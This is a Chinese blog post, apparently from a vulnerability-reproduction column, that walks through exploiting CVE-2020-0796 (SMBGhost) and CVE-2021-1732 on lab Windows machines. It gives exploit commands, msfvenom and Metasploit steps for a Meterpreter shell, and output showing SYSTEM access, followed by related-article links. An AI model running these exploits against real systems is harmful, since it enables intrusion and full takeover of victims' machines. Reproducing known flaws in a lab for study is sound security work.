操作系统漏洞

最新推荐文章于 2023-12-20 17:23:36 发布
最新推荐文章于 2023-12-20 17:23:36 发布
阅读量971 收藏 7
点赞数 1
分类专栏: # 漏洞复现
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/118959520
版权

文章目录

windows

Windows SMB远程代码执行漏洞 CVE-2020-0796 (提权,远程RCE)

影响版本

SMB版本 v3.1.1

Windows 10 Version 1903 for 32-bit Systems 
Windows 10 Version 1903 for x64-based Systems 
Windows 10 Version 1903 for ARM64-based Systems 
Windows Server, Version 1903 (Server Core installation) 
Windows 10 Version 1909 for 32-bit Systems 
Windows 10 Version 1909 for x64-based Systems 
Windows 10 Version 1909 for ARM64-based Systems 
Windows Server, Version 1909 (Server Core installation)

复现
msdn下载镜像
在这里插入图片描述
1、使用奇安信的漏洞扫描来探测

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
在这里插入图片描述2、蓝屏

Github CVE-2020-0796 蓝屏EXP 下载

python3 CVE-2020-0796.py 192.168.170.137

在这里插入图片描述

3、本地提权EXP

运行应用程序后弹出cmd窗口为 system权限,https://github.com/danigargu/CVE-2020-0796

# windows
CVE-2020-0796 本地提权EXP\cve-2020-0796-local > cve-2020-0796-local.exe

# msf
run exploit/windows/local/cve_2020_0796_smbghost

在这里插入图片描述
4、CVE-2020-0796 远程利用代码:

Github CVE-2020-0796 RCE EXP

# msfvenom生成reversed shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py

# 将生成exp.py中的shellcode替换exploit.py中的shellcode,buf 要替换为 USER_PAYLOAD

# msf
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 2333
set rhost 192.168.170.137
exploit

# 执行脚本
python3 exploit.py  -ip 192.168.170.137

测试了一下,关闭windows defender才能使用
在这里插入图片描述
注:监听端口如果一直收不到shell,重新运行一次即可。
在这里插入图片描述

Windows Win32k 本地提权漏洞 CVE-2021-1732

漏洞影响

Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems

使用:

C:\Users\itsme\Desktop> CVE-2021-1732.exe whoami
请按任意键继续. . .
CreateWnd
Hwnd:000403ac   qwfirstEntryDesktop=0000028EE8B06470
BaseAddress:0000028EE8B06000   RegionSize=:0000000000016000
Hwnd:00020354   qwfirstEntryDesktop=0000028EE8B11190
BaseAddress:0000028EE8B11000   RegionSize=:000000000000B000
Hwnd:00020356   qwfirstEntryDesktop=0000028EE8B06790
... ...
qwFrist read=FFFFFD4404E6E7E0
qwSecond read=FFFF9D08390F10D0
qwSecond read=FFFFFD4401200000
qwFourth read=FFFFFD4402ECC220
qwFifth read=FFFF9D083B2AA080
qwSixth read=FFFF9D0839B44080
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 1512!
===============================
nt authority\system

linux

Linux sudo权限提升漏洞 CVE-2021-3156

下载ubuntu

http://mirrors.melbourne.co.uk/ubuntu-releases/20.04/
天问_Herbert555
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
E002-渗透测试常用工具-使用Nessus扫描操作系统漏洞.pdf
12-02
E002-渗透测试常用工具-使用Nessus扫描操作系统漏洞
E027-操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固.pdf
12-02
E027-操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固
win11遇到win32kbase.sys蓝屏解决方法;(超级详细,不懂的请私信up主)
热门推荐
私信up主,有惊喜
08-09 11万+
win11win32kbase.sys蓝屏解决方法
操作系统知识与常见漏洞
m0_62945162的博客
06-12 547
操作系统常见漏洞
windows系统典型漏洞分析
qq_51581716的博客
06-04 2041
由于SHE结构存放在栈中,因此攻击者可以利用栈溢出漏洞,设计特定的溢出数据,将SEH中异常函数的入口地址覆盖为Shellcode的起始地址或可以跳转到Shellcode的跳转指令地址,从而导致程序发生异常时,Windows异常处理机制执行的不是预设的异常处理函数,而是Shellcode。在实际的漏洞利用中,由于动态链接库的装入和卸载等原因,Windows进程的函数栈帧可能发生移位,即Shellcode在内存中的地址是动态变化的,所以上述采用直接赋地址值的简单方式在以后的运行过程中会出现跳转异常。
CVE-2020-0796 漏洞利用教程
丶没胡子的猫
10-30 2945
目录漏洞描述影响版本漏洞检测漏洞利用蓝屏攻击远程代码执行本地提权修复建议 漏洞描述   Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。 影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于ARM64的系统) Windows 10 1903版(用于基于x64的系统) 适用于32位系统的Windows 10版本1909 Windo
45个案例一一破解win32k.sys蓝屏
魔拉宝
03-09 1万+
为什么Windows 2000/XP会蓝屏?45个经典蓝屏案例一一破解  NT内核的操作系统采用的是分层管理结构(层又称为模式),主要有用户层(User Mode)和内核层(Kernel Mode),我们可以通过下面这个形象的比喻来理解Windows的运行规范和蓝屏起因。  平时产品制造厂运行得有序而高效,每个生产小组加班加点制造各种用途的产品,工厂里有个极为严格的规定,那
操作系统心血漏洞
05-27
操作系统漏洞,对心血漏洞做了讲解及一些解决办法
国产操作系统漏洞研究.pdf
最新发布
03-06
2023网络安全创新大会(PPT下载)
网络操作系统漏洞分析及安全策略的研究设计书样本.doc
12-06
网络操作系统漏洞分析及安全策略的研究设计书样本.doc
漏洞复现】CVE-2020-0796永恒之黑漏洞复现
weixin_67698311的博客
06-18 2040
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
CVE-2020-0796 漏洞分析报告(最详细)
RatOnSea的博客
05-28 9435
CVE-2020-0796 漏洞分析报告 1 漏洞介绍 1.1 名称 微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796 1.2 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Se
Win10-永恒之黑漏洞复现
网安小白的博客
09-19 2046
win10永恒之黑漏洞复现,图文详解
各种操作系统、数据库、网络设备、web开发语言常见漏洞
qq_37776764的博客
04-26 937
各种操作系统、数据库、网络设备、web开发语言常见漏洞
Linux常见漏洞修复教程!
蓝易云
06-30 933
请注意,漏洞修复的具体方法和措施取决于特定的漏洞和系统配置。建议您根据具体情况进行进一步研究和采取相应的安全措施。如果不确定如何修复特定漏洞,请参考相关厂商的安全公告和文档,或者咨询安全专家。修复Linux系统中的常见漏洞是确保系统安全性的重要步骤。
(42.1)【操作系统漏洞发现专题】操作系统漏洞之简介、分类、危害、发现工具、利用
04-28 4324
【专题】操作系统漏洞发现
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 933
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
了解操作系统漏洞
不知名佳佳的博客
12-20 448
某个程序(包括操作系统)在设计时未被考虑周全,则这个缺陷或错误将可能被不法分子或黑客利用,通过植入木马病毒等方式来攻击或控制整个计算机,从而窃取计算机中的重要资料和信息,甚至破坏系统。系统漏洞发现的意义在于保护软、硬件设备以及网络的安全。3. 跨站请求伪造(CSRF):CSRF攻击可以利用用户在其他网站上的身份验证信息,以受害者的名义执行未经授权的操作,可能导致用户账户被盗、数据被篡改等。2. 加强安全防护:根据漏洞的特点,我们可以加强系统的安全防护措施,例如配置防火墙、加密通信、限制访问权限等。
漏洞发现之操作系统
剁椒鱼头没剁椒的博客
12-26 1743
系统漏洞(System vulnerabilities)是指应用软件或操作系统软件在逻辑设计上的缺陷或错误,被不法者利用,通过网络植入木马、病毒等方式来攻击或控制整个电脑,窃取电脑中的重要资料和信息,甚至破坏系统。在不同种类的软、硬件设备,同种设备的不同版本之间,由不同设备构成的不同系统之间,以及同种系统在不同的设置条件下,都会存在各自不同的安全漏洞问题。
TLS漏洞属于操作系统漏洞
05-27
TLS漏洞不属于操作系统漏洞。TLS协议是一种跨平台的协议,可以在不同的操作系统和应用程序中实现。因此,TLS漏洞可能存在于任何实现TLS协议的软件中,不仅仅局限于某个特定的操作系统。 虽然TLS实现的软件可能存在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值